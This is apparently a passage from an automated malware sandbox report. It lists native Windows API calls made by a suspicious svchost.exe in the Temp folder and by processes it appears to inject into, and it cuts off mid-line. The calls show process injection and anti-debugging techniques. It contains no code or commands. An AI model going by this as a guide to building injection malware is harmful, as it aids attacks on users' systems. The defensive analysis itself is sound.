      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F881E NtSetInformationThread,TerminateProcess,4_2_023F881E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F887E NtSetInformationThread,TerminateProcess,4_2_023F887E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F906A NtWriteVirtualMemory,4_2_023F906A
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F8454 NtSetInformationThread,TerminateProcess,4_2_023F8454
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F84B9 NtSetInformationThread,TerminateProcess,4_2_023F84B9
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F80B1 NtSetInformationThread,TerminateProcess,4_2_023F80B1
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F791B NtSetInformationThread,TerminateProcess,4_2_023F791B
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 4_2_023F8505 NtSetInformationThread,TerminateProcess,4_2_023F8505
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC696E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_1EC696E0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69A50 NtCreateFile,LdrInitializeThunk,6_2_1EC69A50
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_1EC69660
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_1EC69A00
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69A20 NtResumeThread,LdrInitializeThunk,6_2_1EC69A20
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69780 NtMapViewOfSection,LdrInitializeThunk,6_2_1EC69780
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC697A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_1EC697A0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69710 NtQueryInformationToken,LdrInitializeThunk,6_2_1EC69710
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC698F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_1EC698F0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69840 NtDelayExecution,LdrInitializeThunk,6_2_1EC69840
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69860 NtQuerySystemInformation,LdrInitializeThunk,6_2_1EC69860
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC695D0 NtClose,LdrInitializeThunk,6_2_1EC695D0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC699A0 NtCreateSection,LdrInitializeThunk,6_2_1EC699A0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69540 NtReadFile,LdrInitializeThunk,6_2_1EC69540
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_1EC69910
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC696D0 NtCreateKey,6_2_1EC696D0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69A80 NtOpenDirectoryObject,6_2_1EC69A80
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69650 NtQueryValueKey,6_2_1EC69650
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69670 NtQueryInformationProcess,6_2_1EC69670
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69610 NtEnumerateValueKey,6_2_1EC69610
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69A10 NtQuerySection,6_2_1EC69A10
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69FE0 NtCreateMutant,6_2_1EC69FE0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC6A3B0 NtGetContextThread,6_2_1EC6A3B0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69760 NtOpenProcess,6_2_1EC69760
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69770 NtSetInformationFile,6_2_1EC69770
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC6A770 NtOpenThread,6_2_1EC6A770
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69B00 NtSetValueKey,6_2_1EC69B00
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC6A710 NtOpenProcessToken,6_2_1EC6A710
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69730 NtQueryVirtualMemory,6_2_1EC69730
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC698A0 NtWriteVirtualMemory,6_2_1EC698A0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC6B040 NtSuspendThread,6_2_1EC6B040
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69820 NtEnumerateKey,6_2_1EC69820
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC699D0 NtCreateProcessEx,6_2_1EC699D0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC695F0 NtQueryInformationFile,6_2_1EC695F0
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69950 NtQueueApcThread,6_2_1EC69950
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69560 NtWriteFile,6_2_1EC69560
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC69520 NtWaitForSingleObject,6_2_1EC69520
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_1EC6AD30 NtSetContextThread,6_2_1EC6AD30
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00569854 NtProtectVirtualMemory,6_2_00569854
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_0056791B NtSetInformationThread,NtProtectVirtualMemory,6_2_0056791B
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_005631F6 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,6_2_005631F6
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_005631B2 CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,6_2_005631B2
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00569EFE NtQueryInformationProcess,6_2_00569EFE
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00562E9E Sleep,TerminateThread,Sleep,NtProtectVirtualMemory,6_2_00562E9E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00560720 EnumWindows,NtSetInformationThread,6_2_00560720
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00568454 NtSetInformationThread,6_2_00568454
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_0056887E NtSetInformationThread,6_2_0056887E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_0056881E NtSetInformationThread,6_2_0056881E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_005680B1 NtSetInformationThread,6_2_005680B1
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_005684B9 NtSetInformationThread,6_2_005684B9
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_0056A17E NtQueryInformationProcess,6_2_0056A17E
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00568505 NtSetInformationThread,6_2_00568505
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00563298 NtProtectVirtualMemory,6_2_00563298
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_0056075D NtSetInformationThread,6_2_0056075D
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00560762 NtSetInformationThread,6_2_00560762
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_00569F0C NtQueryInformationProcess,6_2_00569F0C
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_005643B4 LdrInitializeThunk,NtProtectVirtualMemory,6_2_005643B4
      Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 6_2_005643A2 LdrInitializeThunk,NtProtectVirtualMemory,6_2_005643A2
      Source: C:\Windows\explorer.exeCode function: 11_2_05889852 NtCreateFile,NtReadFile,NtClose,11_2_05889852
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569770 NtSetInformationFile,LdrInitializeThunk,16_2_03569770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569710 NtQueryInformationToken,LdrInitializeThunk,16_2_03569710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569B00 NtSetValueKey,LdrInitializeThunk,16_2_03569B00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569FE0 NtCreateMutant,LdrInitializeThunk,16_2_03569FE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569780 NtMapViewOfSection,LdrInitializeThunk,16_2_03569780
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569650 NtQueryValueKey,LdrInitializeThunk,16_2_03569650
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569A50 NtCreateFile,LdrInitializeThunk,16_2_03569A50
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_03569660
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569610 NtEnumerateValueKey,LdrInitializeThunk,16_2_03569610
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_035696D0 NtCreateKey,LdrInitializeThunk,16_2_035696D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_035696E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_035696E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569540 NtReadFile,LdrInitializeThunk,16_2_03569540
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569560 NtWriteFile,LdrInitializeThunk,16_2_03569560
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_03569910
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_035695D0 NtClose,LdrInitializeThunk,16_2_035695D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_035699A0 NtCreateSection,LdrInitializeThunk,16_2_035699A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569840 NtDelayExecution,LdrInitializeThunk,16_2_03569840
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569860 NtQuerySystemInformation,LdrInitializeThunk,16_2_03569860
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0356A770 NtOpenThread,16_2_0356A770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_03569760 NtOpenProcess,16_2_035697